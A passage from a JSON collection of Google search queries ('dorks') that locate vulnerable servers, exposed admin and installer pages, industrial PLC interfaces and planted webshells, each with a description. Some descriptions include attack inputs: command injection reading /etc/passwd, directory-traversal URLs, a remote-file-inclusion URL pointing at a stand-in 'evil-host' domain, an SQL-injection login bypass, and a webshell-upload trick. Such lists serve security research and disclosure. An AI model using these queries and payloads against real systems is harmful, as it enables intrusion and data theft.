have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656 for more info."}, {"dork": "inurl:footer.inc.php", "description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server."}, {"dork": "inurl:info.inc.php", "description": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server."}, {"dork": "\"Welcome to PHP-Nuke\" congratulations", "description": "This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps."}, {"dork": "\"Select a database to view\" intitle:\"filemaker pro\"", "description": "An oldie but a goodie. This search locates servers which provides access to Filemaker pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if Google can crawl it, it's potentially using cleartext authentication."}, {"dork": "allinurl:intranet admin", "description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information. Some of these pages are simply portals to an Intranet site, which helps with information gathering."}, {"dork": "allinurl:install/install.php", "description": "Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images."}, {"dork": "inurl:pls/admin_/gateway.htm", "description": "This is a default login portal used by Oracle. In addition to the fact that this file can be used to footprint a web server and determine it's version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited can lead to unauthorized privileges to the databse. In addition, this page may allow unauthorized modification of parameters on the server."}, {"dork": "intitle:\"Gateway Configuration Menu\"", "description": "This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. Attackers can make changes to the servers found with this query."}, {"dork": "filetype:php inurl:vAuthenticate", "description": "vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts new user groups, activate/inactivate groups or individual accounts, set user level, etc. There are two admin users by default with an easy to guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted.An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the sofware. This software doesn't enforce such a rule."}, {"dork": "\"Welcome to the Prestige Web-Based Configurator\"", "description": "This is the configuration screen for a Prestige router. This page indicates that the router has not yet been setup and any web user can make changes to the router."}, {"dork": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", "description": "hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. On the ftp server usualy it is a directory like:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)And again thnxz goo 4 help us to find it."}, {"dork": "filetype:cgi inurl:\"Web_Store.cgi\"", "description": "Zero X reported that \"Web_Store.cgi\" allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point."}, {"dork": "filetype:cgi inurl:\"fileman.cgi\"", "description": "This brings up alot of insecure as well as secure filemanagers. These software solutions are often used by companies offering a \"simple\" but \"cost effective\" way to their users who don't know unix or html. There is a problem sometimes with this specific filemanager due to insecure use of the session ID that can be found in the unprotected \"fileman.log\" logfile. It has been reported that an attacker can abuse the last document-edit-url of the logfile. By copy pasting that line in a new window it gives the attacker valid user credentials on the server, at least for a while.. (think hours not seconds)."}, {"dork": "inurl:\"index.php?module=ew_filemanager\"", "description": "http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1Technical Description: The PostNuke module works by loading a directory and/or file via the \"pathext\" (directory) and \"view\" (file) variables. Providing a relative path (from the document repository) in the \"pathext\" variable will cause FileManager to provide a directory listing of that diretory. Selecting a file in that listing, or putting a file name in the \"view\" variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.Assuming PostNuke is installed at the root level:/etc directory listing:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/etc/passwd file:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwdFix/Workaround:Use another file manager module for PostNuke, as the authors do not appear to bemaintaining EW FileManager.Vendor Status: Vendor was contacted but did not respond.Credir: Sullo - cirt.netNOTE: mitigating factor, an attacker needs to be registred and logged on to have access rights to this module."}, {"dork": "allinurl:\"index.php\" \"site=sglinks\"", "description": "Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seems to be vulnerable to a code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com"}, {"dork": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", "description": "OsCommerce has some security issues, including the following warning message: \"Warning: I am able to write to the configuration file\". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there."}, {"dork": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fieldsThe servers found here can be acessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search."}, {"dork": "natterchat inurl:home.asp -site:natterchat.co.uk", "description": "NatterChat is a webbased chat system written in ASP.An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access..."}, {"dork": "inurl:aol*/_do/rss_popup?blogID=", "description": "AOL Journals BlogID Incrementing Discloses Account Names and Email AddressesAOL Journals is basically \"America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals BlogID allows an attacker to numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email."}, {"dork": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", "description": "This is a \"double dork\" finds two different shopping carts, both vulnerable1) Cyber-Village Online Consulting Shopping CartCyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.2) Hassan Consulting's Shopping CartFor Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal."}, {"dork": "inurl:newsdesk.cgi? inurl:\"t=\"", "description": "Newsdesk is a cgi script designed to allow remote administration of website news headlines.Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.It is furthermore known that it is possible to run system commands remotely."}, {"dork": "intitle:\"Mail Server CMailServer Webmail\" \"5.2\"", "description": "CMailServer is a small mail webmail server. Multiple vulnerabilities were found, including buffer overflow, SQL Injection and XXS.http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html"}, {"dork": "\"There are no Administrators Accounts\" inurl:admin.php -mysql_fetch_row", "description": "This is a more specific search for the vulnerable PhpNuke index already seen on this website.PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken."}, {"dork": "inurl:servlet/webacc", "description": "I was playing around on the net when I found a small problem with Novell's WebAcces. With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang=\"> this link appeared I clicked it and so I found unprotected dirs.In hxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file called WebAccessUninstall.ini and this file contains info like servernames installationpaths and servers context"}, {"dork": "inurl:\"/NSearch/AdminServlet\"", "description": "This search brings up results for Novell NetWare's Web Search Manager.. at best the sites will be password protected, at worst the site will require no authentication - allowing full control over a site's 'virtual search servers'."}, {"dork": "\"Powered by: vBulletin Version 1.1.5\"", "description": "This google dork reveals vulnerable message boards. It works for all Vbulletin version up to 2.0 beta 2. To try for other versions just change the version number in the dork.These vulnerable message boards allow remote code execution.More on this can be found here:http://www.securiteam.com/securitynews/5IP0B203PI.htmlit has a fairly good explanation of the exploits incorporated with these versions."}, {"dork": "\"html allowed\" guestbook", "description": "When this is typed in google it finds websites which have HTML Enabled guestbooks. This is really stupid as users could totally mess up their guestbook by adding commands like or adding a loop javascript pop-up"}, {"dork": "\"set up the administrator user\" inurl:pivot", "description": "Using this, you can find sites with a Pivot weblog installed but not set up. The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog."}, {"dork": "XOOPS Custom Installation", "description": "XOOPS custom installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations via pre-filled form data."}, {"dork": "intitle:\"MvBlog powered\"", "description": "MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.http://www.securityfocus.com/bid/17481/discuss"}, {"dork": "inurl:\"read.php?datespan=\"", "description": "https://www.exploit-db.com/exploits/5703/"}, {"dork": "intitle:\"A Better ASP User Gallery\"", "description": "https://www.exploit-db.com/exploits/8012/"}, {"dork": "allinurl: In YoUr Dream Lamerz", "description": "https://www.exploit-db.com/exploits/14078/"}, {"dork": "allinurl: op=viewslink&sid=", "description": "https://www.exploit-db.com/exploits/12514/"}, {"dork": "\"intitle:t3al shmeh\"", "description": "https://www.exploit-db.com/exploits/9347/"}, {"dork": ": inurll ', -font => '{Verdana} 8 bold') ->pack ( -side => \"top\" , -anchor => 'e' ) ;", "description": "https://www.exploit-db.com/exploits/3759/"}, {"dork": "inurl:/vb/install/install.php", "description": "Vbulletin installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations. Author: ScOrPiOn"}, {"dork": "intitle:\"[EasyPHP] - Administration\"", "description": "Unprotected EasyPHP Admin page detection.. Author: Aneesh Dogra (lionaneesh)"}, {"dork": "intitle:Locus7shell intext:\"Software:\"", "description": "intitle:Locus7shell intext:\"Software:\"\nSubmitted by lionaneesh\n-- \nThanks\nAneesh Dogra (lionaneesh)"}, {"dork": "intitle:m1n1 1.01", "description": "find the b374k shell.... \nSubmitted by : biLLbud"}, {"dork": "intitle:#k4raeL - sh3LL", "description": "intitle:#k4raeL - sh3LL\nFinds K4rael Shell , though many of them are dead but we can get some and\neven cache data can get you information , making website vulnerable\nAuthor: cyb3r.pr3dat0r"}, {"dork": "filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "description": "This search attempts to find the c99 backdoor that may be knowingly or\nunknowingly installed on servers. I have refined the search in hopes that\nmore general talk about the backdoor, and also talk about the marijuana\nstrain does not pollute the results quite as much.\nAuthor: Teague Newman"}, {"dork": "intitle:awen+intitle:asp.net", "description": "Hi,\nThis google dork exposes any already uploaded asp.net shells which are\navailable in BackTrack.\nhttp://www.google.com/search?q=intitle:awen+intitle:asp.net\nThanks,\nSagar Belure"}, {"dork": "intext: intext: intext: intext: intext:", "description": "More than 100k sites affected\nIt will show asp sites that are vulnerable to sql injection\n(These links actually show pages which are attacked by mass Sql\nInjection...which means they are vulnerable to sql Injection)\n #Author\n ----- pgolecha\n Palash Golecha\n twitter- @pgolecha12"}, {"dork": "intext:SQL syntax & inurl:index.php?=id & inurl:gov & inurl:gov", "description": "# Exploit Title: SQLI Exploit\n# Google Dork: intext:SQL syntax & inurl:index.php?=id & inurl:gov &\ninurl:gov\n# Date: 25/December/2012\n# Exploit Author: BeastarStealacar\n# Vendor Homepage: http://devil-zone.net/"}, {"dork": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "description": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin\nview phpMyAdmin of web sites\nAuthor: Un0wn_X\nFollow: @UnownSec\nE-Mail: unownsec@gmail.com"}, {"dork": "inurl:\"struts\" filetype:action", "description": "Google search for actoin files wich could be explotable via CVE-2013-2251\n\"Multiple Remote Command Execution Vulnerabilities in Apache Struts\""}, {"dork": "inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "description": "Search Oracle Reports likely vulnerable to DB user/password disclosure\n(CVE-2012-3152\nand CVE-2012-3153)\n-- \nFelipe Molina"}, {"dork": "\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "description": "Search for all Apache servers that are running specific versions of\nOpenSSL. These specific versions of OpenSSL could potentially be vulnerable\nto the heartbleed attack.\nAhmad Al-Nounou"}, {"dork": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "description": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org\nlook for a CHANGELOG.txt file that has drupal and SA-CORE in the text, but not the latest 7.32 patch. Ignore github and drupal.org"}, {"dork": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "description": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com\nsites that have robots.txt file (potentially blocking a GD for seeing) CHANGELOG.txt\nCan then check the CHANGELOG.txt file manually for version (not 7.32?)."}, {"dork": "allinurl:moadmin.php -google -github", "description": "The dork \"allinurl:moadmin.php -google -github\" show all the sites that\nuses Mongo DB\nand the moadmin module to amministrate it.\nSome versions of this module allow non autenticated user to execute\narbitrary Unix commands sending a special POST request documented here:\nhttps://www.exploit-db.com/exploits/36251/\nPsyDel"}, {"dork": "allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit", "description": "The dork \"allintext:Copyright Smart PHP Poll. All Rights Reserved.\n-exploit\" show all the sites that uses Smart Pool php module.\nThe login page can be bypassed using these credentials\nUser: admin 'or' 1=1\nPassword: anything\nMore info here: https://www.exploit-db.com/exploits/36386/\nPsyDel"}, {"dork": "\"dirLIST - PHP Directory Lister\" \"Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx\" \"index of\" ext:php", "description": "Google Dork: \"dirLIST - PHP Directory Lister\" \"Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx\" \"index of\" ext:php\nFind vulnerable servers: dirLIST - PHP Directory Lister v0.3.0\nGoogle Dork by Ini Lerm\nExample to exploit it using a form in PHP and upload a webshell.\nRemember, rename your webshell.\nIf your webshell is called \"shell1.php\" rename \"shell1.php .;\"\n------------------------------------------PHP CODE--------------------------------------------------------"}, {"dork": "inurl:\"index.php?option=com_joomanager\"", "description": "1. Google inurl:\"index.php?option=com_joomanager\" = 3540 results\r\n\r\n2. [URL]+/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php gives a file which has password in PLAINTEXT!\r\n\r\nSource: https://twitter.com/ankit_anubhav/status/970673767750959104"}, {"dork": "inurl:\"/user/register\" \"Powered by Drupal\" -CAPTCHA -\"Access denied\"", "description": "GoogleDork #1 ~ inurl:\"/user/register\" \"Powered by Drupal\" -CAPTCHA -\"Access denied\"\r\n\r\nGoogleDork #2 ~ inurl:\"user/register?element_parents=account/mail\"\r\n\r\nGoogleDork #3 ~ inurl:\"*drupal_ajax\"\r\n\r\nGoogleDork #4 ~ ;)"}, {"dork": "inurl:\"q=user/password\"", "description": "for finding drupal"}, {"dork": "\"Powered by vBulletin Version 5.5.4\"", "description": "vBulletin 5.x 0day pre-auth RCE exploit\r\n\r\nThis should work on all versions from 5.0.0 till 5.5.4\r\n\r\nGoogle Dorks:\r\n- site:*.vbulletin.net\r\n- \"Powered by vBulletin Version 5.5.4\""}, {"dork": "\"Powered by Jira Service Desk\"", "description": "# Google Dork: \"Powered by Jira Service Desk\"\r\n\r\n# By using this dork it is possible to find sites vulnerable to\r\nCVE-2019-15003, CVE-2019-15004.\r\n\r\n# Date: 29/05/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"AT-admin.cgi\"", "description": "Description: intitle:\"index of\" \"AT-admin.cgi\"\r\nAuthor: Mohammed Arif H"}, {"dork": "intext:\"(c) GUnet 2003-2007\"", "description": "# Google Dork: intext:\"\u00a9 GUnet 2003-2007\"\r\n\r\n# GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection. This\r\ndork is linked to the following existing exploits:\r\nhttps://www.exploit-db.com/exploits/48106 ,\r\nhttps://www.exploit-db.com/exploits/48163\r\n\r\n# Date: 04/06/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/+CSCOE+/logon.html", "description": "# Dork: inurl:/+CSCOE+/logon.html\r\n# Author: Simgamsetti Manikanta\r\n# Date: 2020-06-04"}, {"dork": "intitle:\"index of\" \"filemail.pl\"", "description": "Author: Mohammed Arif H\r\nDork: intitle:\"index of\" \"filemail.pl\""}, {"dork": "intitle:\"index of\" \"shell.php\"", "description": "This dork will give you all the server which are affected by shells.\r\nDork: intitle:\"index of\" \"shell.php\"\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/"}, {"dork": "site: target.com ext:action | ext:struts | ext:do", "description": "*Dork:* site: target.com ext:action | ext:struts | ext:do\r\n\r\n*Description:* This google dork will list up all the sites which use struts\r\nframework in there site.\r\n\r\n*Author:* Sushant Shashikant Kamble\r\nhttps://www.linkedin.com/in/iamsushantkamble"}, {"dork": "intext:\"Powered By Gila CMS\"", "description": "# Google Dork: intext:\"Powered By Gila CMS\"\r\n# Gila CMS 1.9.1 - Cross-Site Scripting. This dork is linked to the\r\n# following existing exploit: https://www.exploit-db.com/exploits/46557\r\n\r\n# Date: 17/06/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Wing FTP Server - Web\"", "description": "# Google Dork: intitle:\"Wing FTP Server - Web\"\r\n# Wing FTP Server 6.2.5 - Privilege Escalation. This dork is linked to the\r\n# following existing exploit: https://www.exploit-db.com/exploits/48154\r\n# Date: 15/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Vulnerability Report\" \"Critical\" ext:pdf", "description": "# Google Dork: intitle:\"Vulnerability Report\" \"Critical\" ext:pdf\r\n# Vulnerability Reports.\r\n# Date: 30/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:RichWidgets/Popup_Upload.aspx", "description": "# Google Dork: inurl:RichWidgets/Popup_Upload.aspx\r\n# Date: 2020-11-11\r\n# Author: Bryan Rodriguez Martin\r\n# This search returns endpoints where files can be uploaded without authentication."}, {"dork": "intext:\"user name\" intext:\"orion core\" -solarwinds.com", "description": "# Google Dork: intext:\"user name\" intext:\"orion core\" -solarwinds.com\r\n# Description: discover SolarWindws Orion web consoles exposed to the Internet.\r\n# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)"}, {"dork": "inurl /editor/filemanager/connectors/uploadtest.html", "description": "# Google Dork: inurl /editor/filemanager/connectors/uploadtest.html\r\n\r\n# CKEditor 3 - Server-Side Request Forgery (SSRF).\r\nhttps://www.exploit-db.com/exploits/50021\r\n\r\n# Date: 18/6/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Icecast Streaming Media Server\" \"Icecast2 Status\" -.com", "description": "# Google Dork: intitle:\"Icecast Streaming Media Server\" \"Icecast2 Status\" -.com\r\n# Web Server Detection\r\n#Date: 03/08/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"index of\" \"/views/auth/passwords\"", "description": "# Google Dork: intitle:\"index of\" \"/views/auth/passwords\"\r\n# Vulnerable Server\r\n# Date: 08/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"TileServer GL - Server for vector and raster maps with GL styles\"", "description": "# Google Dork: intitle:\"TileServer GL - Server for vector and raster maps with GL styles\"\r\n# Vulnerable Servers\r\n# Date:07/07/2021\r\n# Exploit Author: Jan-Jaap Korpershoek"}, {"dork": "inurl:adm/login.jsp.bak", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Vulnerable Server\r\n# Date: 12/11/2021 \r\n# Exploit Author: Md Anzaruddin"}, {"dork": "intitle:\"HFS\" AND intext:\"httpfileserver 2.3\" AND -intext:\"remote\"", "description": "# Dork: intitle:\"HFS\" AND intext:\"httpfileserver 2.3\" AND\r\n-intext:\"remote\"\r\n# Author: Alexander Ahmann\r\n# Email: hackermaneia@riseup.net\r\n# Date: 11 March, 2022\r\n# Category: Vulnerable Servers\r\n\r\nThapa (2016) devised an exploit targeting version 2.3 of Rejetto.com\r\n(n.d.)'s \"HTTP File Server.\" Thapa included the Google dork\r\n'intext:\"httpfileserver 2.3\"' as a means to find webservers on the\r\ninternet running the vulnerable service. However, there is a limitation\r\nwith this dork, as it instructs Google's search engine to list websites\r\nwhich includes web pages with the text \"httpfileserver 2.3\" in it. This\r\nwill cause Google search to report security bulletins discussing the\r\nvulnerability.\r\n\r\nTo mitigate this problem, I present a slight modification of Thapa's\r\nGoogle dork to \"filter out\" said security bulletins: 'intitle:\"HFS\" AND\r\nintext:\"httpfileserver 2.3\" AND -intext:\"remote\"' (without single\r\nquotes, with double quotes). Elaborating on the components of my\r\nmodified Google dork:\r\n\r\n1. 'intitle:\"HFS\"' will report web pages with the string \"HFS\" in the\r\n metatag. This is a feature that I have identified unique to\r\nRejetto.com (n.d.)'s HTTP File Server.\r\n2. 'intext:\"httpfileserver 2.3\"' will report web pages with the string\r\n\"httpfileserver 2.3\" in its body. This is a feature that Thapa (2016)\r\nidentified in Rejetto.com (n.d.)'s HTTP File Server.\r\n3. '-intext:\"remote\"' will \"filter out\" web pages with the string\r\n\"remote\" in its body. I have identified this string as a feature of\r\nsecurity bulletins reporting on the Rejetto.com (n.d.)'s HTTP File\r\nServer vulnerability.\r\n\r\nThe \"AND\" boolean operator is used to narrow down the search results and\r\ndecrease the rate of false positives.\r\n\r\nReferences\r\n----------\r\nRejetto.com (n.d.). HFS ~ HTTP File Server. Retrieved on Mar. 11, 2022\r\nfrom: http://rejetto.com/hfs/\r\n\r\nThapa, A. K. (2016). Rejetto HTTP File Server (HFS) 2.3.x - Remote\r\nCommand Execution (2). Exploit Database. Retrieved on Mar. 11, 2022\r\nfrom: https://www.exploit-db.com/exploits/39161"}, {"dork": "inurl:\"/geoserver/ows?service=wfs\"", "description": "# Google Dork: inurl:\"/geoserver/ows?service=wfs\"\r\n# Vulnerable Servers\r\n# Date: 04/07/2023\r\n# Author: Bipin Jitiya"}, {"dork": "inurl:install.php intitle:\"Froxlor Server Management Panel - Installation\"", "description": "inurl:install.php intitle:\"Froxlor Server Management Panel - Installation\""}, {"dork": "Apache Struts 2.x Path Traversal Vulnerability (CVE-2023-50164) Detection Dork", "description": "Dork:\r\nintitle:\"Apache Struts 2.5\" \"index of /\" -git\r\nExplanation:\r\nintitle:\"Apache Struts 2.5\": This part specifies that the search results\r\nmust have the words \"Apache Struts 2.5\" in the title. It helps narrow down\r\nthe results to instances related specifically to Apache Struts version 2.5.\r\n\r\n\"index of /\": This part looks for directories with the \"index of /\" string.\r\nSuch directories often contain a listing of files and folders, which could\r\nbe unintentionally exposed and may include sensitive information.\r\n\r\n-git: This part excludes results that contain the term \"git\". The idea is\r\nto filter out Git repositories from the search results, focusing on other\r\ntypes of exposed directories.\r\n\r\n*Sample output : *\r\nhttps://mirror.softaculous.com/apache/struts/2.5.30/\r\nhttps://ftp.unicamp.br/pub/apache/struts/2.5.25/\r\nhttps://ftp.itu.edu.tr/Mirror/Apache/struts/2.5.32/\r\nhttps://repository.jboss.org/maven2/apache-struts/struts/\r\nhttps://mirrors.gigenet.com/apache/struts/\r\nhttps://ftp.riken.jp/net/apache/struts/\r\nhttps://mirror.math.princeton.edu/pub/apache/struts/\r\n\r\n This Google dork is searching for instances where the title includes\r\n\"Apache Struts 2.5,\" and the webpage has a directory listing (\"index of /\")\r\nbut excludes any results related to Git repositories. The aim is to\r\nidentify potentially exposed Apache Struts 2.5 instances that might have\r\nunintentionally revealed directory structures.\r\n\r\n\r\nAdditional Information:\r\n\r\nAffected versions: Struts 2.x before 2.5.33 or 6.x before 6.3.0.2\r\nDescription: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50164\r\n\r\nThank you for your consideration.\r\n\r\nSincerely,\r\n\r\n-- \r\n*Parth Jamodkar*\r\n\r\n*CLoud security researcher 3*\r\n*LinkedIn*"}, {"dork": "intitle:\"OpenVpn Status Monitor\"", "description": "# Exploit Title: Anonymous Access to OpenVpn Monitoring Dashbaord\r\n# Google Dork: intitle:\"OpenVpn Status Monitor\"\r\n# Date: 27 Jan 2024\r\n# Exploit Author: Sabean Technology\r\n# Vendor Homepage: https://github.com/furlongm/openvpn-monitor\r\n\r\nDemewoz Agegnehu | Sabean Technology | https://sabtechx.com"}, {"dork": "intitle:\"Installation Wizard - PowerCMS v2\"", "description": "Author: nadirb19\r\nDork: intitle:\"Installation Wizard - PowerCMS v2\""}, {"dork": "intitle:\"Welcome to iTop version\" wizard", "description": "Author: nadirb19\r\nDork: intitle:\"Welcome to iTop version\" wizard"}, {"dork": "allintitle:\"Bright Cluster Manager\" site:.edu", "description": "#Google Dork: allintitle:\"Bright Cluster Manager\" site:.edu\r\n#Pages Containing Login Portals\r\n#Date: 1/12/2024\r\n#Author: *Baldwin Hackers*"}, {"dork": "\"PMB\" AND (\"changelog.txt\" OR inurl:opac_css)", "description": "The Dork Filters for PMB Services, Mostly vulnerable to SQli and handful of\r\nCVEs\r\n\r\n*\"PMB\" AND (\"changelog.txt\" OR inurl:opac_css)*"}, {"dork": "Google Dorks for Default XAMPP Dashboards", "description": "Exploit Title:XAMPP Default Dashboard Panels\r\n\r\nGoogle Dork:\r\nintext:\"Welcome to XAMPP for *\" intitle:\"Welcome to XAMPP\" inurl:/dashboard\r\n\r\nintext:apache + mariadb + php + perl intext:\"welcome to xampp for *\"\r\nintitle:\"welcome to xampp\"\r\n\r\nDate: 06/03/2024\r\n\r\nExploit Author: Gurudatt Choudhary"}, {"dork": "inurl:\"wa.exe?TICKET\"", "description": "inurl:\"wa.exe?TICKET\""}, {"dork": "intitle:\"FileCatalyst file transfer solution\"", "description": "# Google Dork: intitle:\"FileCatalyst file transfer solution\"\r\n# Files Containing Juicy Info\r\n# Date: 19/03/2024\r\n# Exploit Kamran Saifullah"}, {"dork": "allintitle:\"ITRS OP5 Monitor\"", "description": "Dear Off Sec Team,\r\n\r\nHere is a new Google Dork:\r\n\r\n#GoogleDork allintitle:\"ITRS OP5 Monitor\"\r\n#Description login pages for network monitoring devices\r\n#Author *Girls Learn Cyber*\r\n#Date 4/12/2024"}, {"dork": "Google Dork Submisson For GlobalProtect Portal", "description": "# Exploit Title: Dork For GlobalProtect Portal (Login Panels to test\r\nCVE-2024-3400)\r\n\r\n# Google Dork:\r\nintext:GlobalProtect Portal inurl:/global-protect intitle:GlobalProtect Portal\r\n\r\n# Date: 17/05/2024\r\n\r\n# Author: Gurudatt Choudhary"}, {"dork": "intext:\"siemens\" & inurl:\"/portal/portal.mwsl\"", "description": "Description:\r\nGoogle Dork : intext:\"siemens\" & inurl:\"/portal/portal.mwsl\"\r\n\r\nThis Google dork, intext:\"siemens\" & inurl:\"/portal/portal.mwsl\", reveals\r\nthe web interfaces of Siemens S7 series PLC controllers. These interfaces\r\nprovide access to critical control and monitoring functions of industrial\r\nsystems. Unauthorized access can lead to significant operational\r\ndisruptions and security risks in industrial environments.\r\n\r\nProof Of Concept (PoC):\r\nSteps to Reproduce:\r\n1.Open Google Search.\r\n2.Enter the dork query: intext:\"siemens\" & inurl:\"/portal/portal.mwsl\".\r\n3.Review the search results to find URLs of Siemens S7 PLC web interfaces.\r\n4. Click on a search result to access the web interface of the PLC.\r\n5.Attempt to log in using default or commonly known credentials (if login\r\nis required)."}, {"dork": "intitle:\"SSL Network Extender Login\" -checkpoint.com", "description": "This dork is for CVE-2024-24919.\r\n\r\n# Google Dork: [intitle:\"SSL Network Extender Login\" -checkpoint.com]\r\n# Date: [30/05/2024]\r\n# Pages Containing Login Portal\r\n# Exploit: Everton Hydd3n"}, {"dork": "inurl:\"cgi-bin/koha\"", "description": "Find webservers running Koha library system\r\n\r\n-- \r\nRegards,\r\n\r\n*Hilary Soita.*"}], "Error Messages": [{"dork": "\"ORA-00921: unexpected end of SQL command\"", "description": "Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames."}, {"dork": "intitle:\"the page cannot be found\" inetmgr", "description": "IIS 4.0 servers. Extrememly old, incredibly easy to hack..."}, {"dork": "intitle:\"the page cannot be found\" \"2004 microsoft corporation\"", "description": "Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box..."}, {"dork": "\"Fatal error: Call to undefined function\" -reply -the -next", "description": "This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code."}, {"dork": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", "description": "This search will show an attacker some PHP error logs wich may contain information on wich an attack can be based."}, {"dork": "\"The script whose uid is \" \"is not allowed to access\"", "description": "This PHP error message is revealing the webserver's directory and user ID."}, {"dork": 